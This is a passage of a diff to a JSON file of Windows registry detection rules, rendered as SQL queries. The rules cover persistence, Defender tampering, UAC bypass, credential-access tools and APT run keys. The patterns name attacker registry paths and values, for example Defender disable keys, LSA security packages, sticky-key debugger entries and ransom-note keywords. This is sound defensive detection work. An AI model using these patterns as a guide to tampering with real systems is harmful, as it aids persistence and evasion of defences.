'%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" - }, - { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", - "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_event_mal_flowcloud.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", - "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Administrator actions" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1136.001" ], "falsepositives": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows 